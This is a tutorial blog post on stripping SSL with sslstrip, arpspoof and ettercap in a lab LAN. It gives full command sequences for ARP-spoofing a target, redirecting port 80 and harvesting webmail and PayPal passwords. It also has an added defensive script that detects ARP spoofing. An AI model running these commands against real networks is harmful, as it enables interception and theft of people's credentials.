Stripping SSL + Sniffing HTTPS (SSLStrip)

This video shows that SSL encryption alone doesn't guarantee a secure session. As proof, the passwords for a web-based email service (Google Mail) and an online bank (PayPal) are shown.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/SSLStrip.mp4

Method

  • A 'Man In The Middle' attack is performed, so all the traffic flows through the attacker.
  • HTTP traffic on port 80 is picked out and redirected / forwarded onto a different port.
  • SSLStrip listens on that port and removes the SSL connection before passing the traffic back to the user.
  • ettercap then picks out the username & password.
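
A defensive check for the first step above, as an added example that is not part of the original post: run on the target machine, it reads `ip neigh show` output and flags a gateway entry that differs from a known-good MAC or shares its MAC with another host. The function name `check_gateway`, the sample tables, the MAC addresses and the 192.168.1.7 host are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): spot the neighbour-table
# symptom of ARP spoofing against the gateway. Input: `ip neigh show` text.

# check_gateway GATEWAY_IP [KNOWN_GOOD_MAC]   (neighbour table on stdin)
# Returns 0 = looks fine, 1 = suspect, 2 = gateway not in table.
check_gateway() {
    gw="$1"
    want=$(printf '%s' "${2:-}" | tr 'A-F' 'a-f')
    table=$(cat)
    # MAC currently cached for the gateway (entries without lladdr are skipped).
    gw_mac=$(printf '%s\n' "$table" | awk -v ip="$gw" '$1 == ip { for (i = 2; i < NF; i++) if ($i == "lladdr") { print tolower($(i + 1)); exit } }')
    if [ -z "$gw_mac" ]; then
        echo "UNKNOWN: no MAC cached for $gw"; return 2
    fi
    # Strongest check: compare against a MAC recorded while the LAN was trusted.
    if [ -n "$want" ] && [ "$gw_mac" != "$want" ]; then
        echo "SUSPECT: $gw is at $gw_mac, expected $want"; return 1
    fi
    # Heuristic: a second IP answering with the gateway's MAC.
    dupes=$(printf '%s\n' "$table" | awk -v ip="$gw" -v mac="$gw_mac" '$1 != ip { for (i = 2; i < NF; i++) if ($i == "lladdr" && tolower($(i + 1)) == mac) print $1 }')
    if [ -n "$dupes" ]; then
        echo "SUSPECT: $gw ($gw_mac) shares its MAC with:" $dupes; return 1
    fi
    echo "OK: $gw is at $gw_mac"; return 0
}

# Constructed sample tables (MACs and the .7 host are made up).
CLEAN_TABLE='192.168.1.1 dev wlan0 lladdr 02:00:00:00:00:01 REACHABLE
192.168.1.7 dev wlan0 lladdr 02:00:00:00:00:AA STALE
192.168.1.9 dev wlan0 FAILED'
SPOOFED_TABLE='192.168.1.1 dev wlan0 lladdr 02:00:00:00:00:aa REACHABLE
192.168.1.7 dev wlan0 lladdr 02:00:00:00:00:AA STALE'

printf '%s\n' "$CLEAN_TABLE"   | check_gateway 192.168.1.1 || true
printf '%s\n' "$SPOOFED_TABLE" | check_gateway 192.168.1.1 || true
```

The shared-MAC heuristic only fires when the other host's real IP is also in the cache, and a router with several addresses can trigger it legitimately, so the pinned-MAC comparison is the more reliable of the two checks.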

Tools

  • sslstrip
  • arpspoof
  • ettercap

All in BackTrack 4 Pre Final

Network Setup

Target's IP: 192.168.1.6

Gateway: 192.168.1.1

Software

Name: sslstrip

Version: 0.2

Home Page: http://www.thoughtcrime.org/software/sslstrip/index.html

Download Link: hxxp://www.thoughtcrime.org/software/sslstrip/sslstrip-0.2.tar.gz


Name: arpspoof (DSniff)

Version: 2.3

Home Page: http://www.monkey.org/~dugsong/dsniff/

Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz


Name: ettercap

Version: 0.7.3

Home Page: http://ettercap.sourceforge.net/

Download Link: http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download

Commands

kate  /etc/etter.conf
# uncomment redir_command_off in the iptables, linux section
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i wlan0



### Alternative
wireshark

kate  /etc/etter.conf

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

arpspoof -i eth0 -t 192.168.1.12 192.168.1.1
#ettercap -T -q -i eth0 -M ARP /192.168.1.1/ /192.168.1.12/

ettercap -T -q -i eth0

sslstrip -k -f

Notes

  • You could save the packets instead and look through them later, in case ettercap doesn't pick up the information you need!

Song: 16 Bit Lolitas - Nobody Seems To Care

Video length: 03:55

Capture length: 4:41

Blog Post: https://blog.g0tmi1k.com/2009/07/stripping-ssl-sniffing-https/